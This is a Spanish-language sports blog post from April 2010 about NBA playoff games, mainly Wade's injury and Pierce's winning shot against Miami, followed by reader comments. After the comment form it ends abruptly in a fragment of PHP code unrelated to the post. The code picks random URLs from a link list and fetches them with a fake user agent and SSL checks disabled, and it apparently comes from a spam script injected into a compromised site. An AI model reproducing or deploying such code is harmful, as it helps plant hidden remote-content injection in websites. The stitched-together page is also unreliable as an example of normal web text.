Playoffs 23/04/2010: 30 segundos fatídicos

24 de April de 2010 por TheDeerHunter

No parecía un mal escenario. American Airlines Arena en Miami. Empate y posesión en manos de Dwyane Wade a escasos 30 segundos del final. La afición local rugiendo de emoción. Los Heat habían logrado una eficiencia ofensiva casi por encima de sus posibilidades. Haslem, Chalmers, Dorell Wright, incluso Beasley le habían ofrecido a Flash por primera vez la ayuda que necesitaba para plantar cara a los Celtics. Ese era el momento de rubricarlo, porque hasta ese último instante se había mostrado imparable, como casi siempre.

Todavía restarían unos pocos segundos para que los visitantes dijeran la última palabra, por eso Wade apuraba la posesión en la frontal del aro. Allen atento a la penetración. Wade se eleva como sólo algunos superhombres pueden, lanza y falla. Conste que no es la mejor forma de resolver que le hayamos visto. Allen llega algo tarde al tiro y coloca de forma involuntaria su pie bajo la pierna izquierda de Wade, al caer. El tobillo no se tuerce, lo hace casi imperceptiblemente la rodilla pero con toda la fuerza de sus 100 kilos de peso percutiendo desde un salto como ese sobre ella. Algo se rompe en la estrella de los Heat. Posiblemente haya sido su último tiro este curso, y quién sabe si lo será con esa camiseta.

Sin tiempo todavía para asimilar lo que ha pasado, Pierce apura la última posesión con Wright sobre él muy bien colocado. Bota tres veces, amaga con la penetración, un paso atrás a la altura de la bombilla que le hemos visto hacer miles de veces y, con el mínimo espacio ganado, ejecuta un tiro que fluye desde sus venas. Canasta y bocina. Fin de la fiesta.

La imagen incide en el contraste de la alegría de los Celtics con la cara desencajada de Spoelstra y de Chalmers, tratando de entender lo que ha pasado y de prepararse para un futuro inmediato bastante duro, incluído un último partido que ninguno de ellos tendrá hígados para disputar. Es el drama de los playoffs que tanto nos fascina. Los éxitos inesperados frente a las oportunidades perdidas. Casi un poema épico.

Fue la primera de una larga lista de emociones. La cosa empieza a ponerse fea para dos favoritos a la final del Oeste.

Vimos romper el sagrado “narigón” de Ginobili que, con el punto de mira desviado (nunca mejor dicho) no tuvo su noche. A pesar de todo, los Spurs se impusieron. Malas vibraciones en el núcleo de los Mavs. Resulta inexplicable que, con ese pedazo de plantilla, Nowitzki cada día que pasa le veamos más solo. Por los Spurs, sin embargo, cada día hay más gente que puede aportar. Anoche George Hill fue un complemente letal y vimos un Tony Parker al nivel de las mejores tardes, para ruina de Jason Kidd. Popovic le está ganando la partida de ajedrez a Carslile, quien en el próximo partido se jugará la vida. Si lo pierde, la camiseta de pre-adolescente que vestía anoche Cuban no le va a llegar al cuello.

Se tuerce también la eliminatoria para los Nuggets. Anoche Millsap les arrasó en la zona, mientras que Melo se perdió en un mar de faltas (cometidas y recibidas). Con Deron y Boozer muy cerca de su máximo nivel y Miles controlando bien a la estrella rival, las cosas funcionan asombrosamente bien para los de Sloan. Vimos incluso a un Korver excepcionalmente activo, incluso en labores defensivas, con una gran distribución en el tiro y aportando fantásticamente en los minutos que permaneció en pista. También debemos señalar el gran acierto con Fesenko, que está cuajando unos partidos muy serios, minimizando con toda la humildad del mundo la irreparable baja de Okur. Y pronto vuelve Kirilenko…

Comenta

7 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Utah le esta ganando a Denver en gran parte por tener mucha mas inteligencia baloncestitica, y desde luego por Sloan, que le saca partido a lo mas mínimo.

      Citar

  2. Kantonyo dice:
    #2

    Esa inteligencia de la que habla Dirk, es la que falta a Carmelo y le sobra a Deron.

      Citar

  3. sergio dice:
    #3

    No se como a Jermaine O’neal, siendo el jugador que más cobra de la liga tras McGrady y Bryant, puede dormir por las noches con los partidos que hace… Desde mi punto de vista es el mayor sinvergüenza que he visto jamás en la liga en cuanto a rendimiento/salario. Sigue teniendo un físico prodigioso a pesar de la edad, siendo su actitud y valentía (algo que hace años pensé que no le faltaría) lo que lastra sus posibilidades. Que alegría para Miami poder deshacerse de su contrato el año que viene…

      Citar

  4. Love Denise dice:
    #4

    Yo tampoco creo que Jermaine pueda dormir por las noches, no por su rendimiento, sino por la cantidad de carne femenina suculenta que hay por esas tierras jejjejejjeje:)

      Citar

  5. sergio dice:
    #5

    Tu parte de razón tienes.. pero eso debería afectarlos a todos por igual no???

      Citar

  6. Love Denise dice:
    #6

    claro que les afecta a todos: beasley, chalmers, richardson, arroyo…..y a otros no se le nota porque son directamente malos (joel anthony, cook, wright), o porq haga lo que haga es muy bueno (wade)

      Citar

  7. sergio dice:
    #7

    Joe… es que las mujeres de Miami no son las mujeres de Dakota del Norte con todos mis respetos jajaja. El año que viene puede que sean el equipo con mayor espacio salarial para acometer otros fichajes. Si consiguen hacerse con Bosh y renovar a Wade pueden ser una equipazo. El ser una gran ciudad, con un gran mercado (sobre todo latinoamericano) y el clima pueden engatusar a más de uno. Yo desde luego prefiero vivir en Miami que en Chicago. Otra cosa es lo que le diga el corazón a Wade por ser de allí.

    Siempre me gustaron los Heat, sobre todo desde que jugaban juntos Mourning y Anfernee Hardaway y sus “crossovers”. Me caen simpáticos leche…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>